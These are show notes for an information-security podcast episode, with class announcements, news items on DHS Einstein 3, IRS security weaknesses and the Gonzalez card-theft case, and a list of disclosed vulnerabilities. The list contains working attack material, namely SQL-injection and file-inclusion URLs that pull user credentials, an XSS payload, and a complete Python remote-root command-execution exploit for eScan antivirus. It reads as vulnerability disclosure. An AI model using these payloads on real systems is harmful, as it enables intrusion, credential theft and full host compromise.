ISD Podcast Episode 94 for March 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
- Webmatic is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission to the ‘index.php’ script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user’s browser within the trust relationship between the browser and the server, leading to a loss of integrity. Version 3.0.3 is impacted, though it is possible that prior versions may be affected as well. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URL.
- Fw-BofF (oolime-resurrection) is subject to Multiple Remote Include Vulnerabilities. Version 1.5.3beta is impacted, though it is posible that prior versions may be affected as well. Example RFI URL is available:
http://www.sample.com/core/dispatcher.php?configRootDir=[Shell]
Example LFI URL is available: http://www.sample.com/core/database.php?configDBchoice=[LFI%00]
- The PHP-Kit b-day.php add-on is subject to a SQL injection vulnerability because the application fails to sufficently sanitize user supplied input used in a query. Example URL is available:
http://www.sample.com/include.php?path=bday.phpausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1–
- PowieSys is subject to a index.php (shownews) SQL Injection Vulnerability. Version 0.7.7 alpha is impacted as well as all prior versions. Example URL is available:
http://www.sample.com/news/index.php?shownews=999999′+union+select+1,2,3,4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1–+
- Aris AGX agXchange ESM is subject to an Open Redirection Vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link. Example URL is available:
http://www.sample.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com
- Yupi CMS is subject to a Remote File Inclusion (RFI) vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link. Version 0.44 is impacted. Example URL is available:
http://www.sample.com/filemanager/connectors/php/config.php?clientDir=[inj3ct0r]
- RepairShop2 is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission. Version 1.9.023 is impacted. Example URL is available:
http://www.sample.com/shop/?b=products.details&prod=[INDONESIANCODER]
- Zephyrus CMS is subject to a remote SQL injection vulnerability. This flaw exists because the application fails to sufficiently santize user supplied inputs in a SQL query. Example URL is available:
http://www.sample.com/index.php?pagina=news&id=[SQL Injection] - Xataface is subject to a Admin Auth Bypass vulnerability. Exploiting this could allow an attacker to could edit/delete/create records in the database, create new admin accounts and view all the users and passwords. Example URL is available:
http://www.sample.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
- Multiple MicroWorld eScan products are vulnerable to a remote command-execution vulnerability because they fail to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands with superuser privileges. Successful attacks will completely compromise affected computers. The issue affects the following products versions prior to 4.1.x of eScan for Linux Desktop,
eScan for Linux File Servers, MailScan for Linux Mailservers and WebScan for Linux Proxy Servers. Exploit code is available:
#!/usr/bin/env python
import sys
from socket import *#auther: Mohammed almutairi
#(Sa.attacker@gmail.com)
“”"
MicroWorld eScan Antivirus < 3.x Remote Root Command Execution
Package MWADMIN package vulnerabilities (linux)
The Base Packages (MWADMIN and MWAV) must be installed before eScan
Link:http://www.escanav.com/english/content/products/escan_linux/linux_products.asp
infcted: aLL version 3.X eScan linux
1-Escan for Linux Desktop
2-Escan for Linux file Servers
3-MailScan for Linux and webscan
Tested On RedHat and Fedora
ULTRA PRIV8
Description:
From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
include(“common_functions.php”); <—> (1)if ($_POST['forgot'] == “Send Password”)
{
$user = $_POST["uname"]; <—>(2) insecure:(vulnerable code in forgotpassword.php and common_functions.php
in (1) $runasroot = “/opt/MicroWorld/sbin/runasroot”;
we can injection through via the file forgotpassword.php As you can see (2)
with remote root Command Execution
>> eScan.py www.***.com
eScan@/bin/sh:$Sa$ => reboot
[*] Done! sent to: www.***.com
“”"def xpl():
if len(sys.argv) < 2:
print “[*] MicroWorld eScan Antivirus Remote Root Command Execution”
print “[*] exploited by Mohammed almutairi”
print “[*] usage: %s host” % sys.argv[0]
returnhost = sys.argv[1]
port = 10080 # default port
cmd = raw_input(“eScan@/bin/sh:$Sa$ => “)
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sh=”/opt/MicroWorld/sbin/runasroot /bin/sh -c ‘%s’” % cmdsa= “uname=;%s;” %sh # (;sh;) —> Here Play See to ^(2)^
sa+= “&forgot=Send+Password”s=”POST /forgotpassword.php HTTP/1.1\r\n”
s+=”Host: %s:%d\r\n”%(host, port)
s+=”User-Agent: */*\r\n”
s+=”Accept: ar,en-us;q=0.7,en;q=0.3\r\n”
s+=”Content-Type: application/x-www-form-urlencoded\r\n”
s+=”Content-Length: %d \r\n\r\n”%len(sa)
s+=sasock.sendall(s)
print “[*] Done! sent to: %s” % host
sock.close()if __name__==”__main__”:
xpl()
sys.exit(0) - The ‘com_jresearch’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
- Astaro Security Linux is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Astaro Security Linux 5; other versions may also be affected. Example POST data is available: username=my@example.com&password=DTC&SID=>”><script>alert(“XSS !!!”)</script>&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0
- Uiga Fan Club, Personal Portal and Business Portal are subject to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL is available: http://www.sample.com/forum/uigabusinessportal/index.php?view=photos&id=1
+union+select+1,2,concat(user_id,0x3a,username,0x3a,password),4,5+from+tbl_user+where+user_id=1n–
Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/19/einstein-3-test-intrusion-prevention-system.aspx
The Homeland Security Department plans to partner with a commercial Internet Service Provider and another government agency to pilot technology developed by the National Security Agency to automate the process of detecting cyber intrusions into civilian agencies. systems, making it possible to thwart the attacks before damage is done.
The new technologies and automated processes of Einstein 3 are improvements over Einstein 1 and 2 technology, DHS officials said. Einstein 3′s predecessors focused on intrusion detection, allowing analysts to scan records of connections to agencies. systems and use signatures to scan network traffic for cyber threats. Einstein 3 would add the ability to prevent those intrusions.
Einstein 3 also would improve information sharing by DHS’ U.S. Computer Emergency Readiness Team (US-CERT), allowing the department to automate the process for sending alerts about detected network intrusions.
News item 2:http://norton.newslinevine.com/
If you live in Seattle, Boston, Washington, D.C., San Francisco, or Raleigh, N.C., then you’re in one of the top five riskiest cities when it comes to cybercrime.
But, it’s not where you live that makes it more dangerous, it’s the type of acclivities that people in these cities tend to do, according to Symantec Internet safety advocate Marian Merritt.
“Some of the common factors for residents of those cities would be highly educated, affluent, a lot of people using tech all day long in a variety of fashions,” Merritt said. “It’s those activities that have more to do with increasing their risk than the ZIP code that they live in.”
The following are ranked the Norton Top 10 Riskiest Online Cities:
1.) Seattle
2.) Boston
3.) Washington, D.C.
4.) San Francisco
5.) Raleigh, N.C.
6.) Atlanta
7.) Minneapolis
8.) Denver
9.) Austin, Texas
10.) Portland, Ore.
News item 3: http://www.gao.gov/new.items/d10355.pdf
A study (PDF) issued last week, the Government Accountability Office states that the IRS has corrected less than one-third of the 89 security weaknesses identified in its audit of the tax agency last year.
“While IRS has corrected 28 control weaknesses and program deficiencies, 61 of them — or about 69 percent — remain unresolved or unmitigated,” the report states. “For example, IRS continued to install patches in an untimely manner and used passwords that were not complex. In addition, IRS did not always verify that remedial actions were implemented, or effectively mitigate the security weaknesses.”
Weaknesses in IRS systems “continue to jeopardize the confidentiality, integrity, and availability of financial and sensitive taxpayer information,” the GAO says. “IRS did not consistently implement controls that were intended to prevent, limit, and detect unauthorized access to its systems and information.
“For example,” the report continues, “IRS did not always (1) enforce strong password management for properly identifying and authenticating users; (2) authorize user access to permit only the access needed to perform job functions; (3) log and monitor security events on a key system; and (4) physically protect its computer resources.”
A key reason for the slow resolution of the vulnerabilities is that the IRS has not yet fully implemented its agencywide IT security program to ensure controls are appropriately designed and operating effectively, the GAO says. The agency hasn’t been conducting annual reviews of risk assessments, for example, and it hasn’t been checking to ensure contractors received security awareness training.
“Until these control weaknesses and program deficiencies are corrected, the agency remains unnecessarily vulnerable to insider threats related to the unauthorized access to and disclosure, modification, or destruction of financial and taxpayer information, as well as the disruption of system operations and services,” the report says.
News item 4: http://www.wired.com/threatlevel/2010/03/gonzalez-gov-memo/
Albert Gonzalez was sentenced to 25-years behind bars for leading a gang of cyberthieves who stole tens of millions of credit and debit card numbers from a transaction processor and several giant retail chains, federal prosecutors argued in a court filing.
“[T]he sentences would be the longest ever imposed in an identity theft case and among the longest imposed for a financial crime, which is appropriate because Gonzalez was at the center of the largest and most costly series of identity thefts in the nation’s history,” wrote Boston-based Assistant U.S. Attorney Stephen Heymann. “He knowingly victimized a group of people whose population exceeded that of many
major cities and some states.”
The government also disputed a defense claim that Gonzalez suffers from Asperger’s disorder, a mild form of autism that was grounds for a slightly reduced sentence in a previous hacking prosecution.
Gonzalez, 28, is set for sentencing next week on three indictments covering virtually every headline-making bank-card theft in recent years, including intrusions at TJX, DSW Shoe Warehouse, Office Max, Hannaford Brothers, 7-Eleven, and Heartland Payment Systems, which alone exposed magstripe data on 130 million credit and debit cards. He performed the intrusions while an informant for the Secret Service.
News item 5: http://www.wired.com/threatlevel/2010/03/gonzalez-salary/
Convicted TJX hacker Albert Gonzalez earned $75,000 a year working undercover for the U.S. Secret Service, informing on bank card thieves before he was arrested in 2008 for running his own multimillion-dollar card-hacking operation.
The information comes from one of Gonzalez.s best friends and convicted accomplices, Stephen Watt. Watt pleaded guilty last year to creating a sniffer program that Gonzalez used to siphon millions of credit and debit card numbers from the TJX corporate network while he was working undercover for the government.
Watt said that Gonzalez was paid in cash, which is generally done to protect someone’s status as a confidential informant. The Secret Service said it would not comment on payments made to informants.
“It’s a significant amount of money to pay an informant but it’s not an outrageous amount to pay if the guy was working full time and delivering good results,” says former federal prosecutor Mark Rasch. “It’s probably the only thing he was doing – other than hacking into TJX and making millions of dollars.”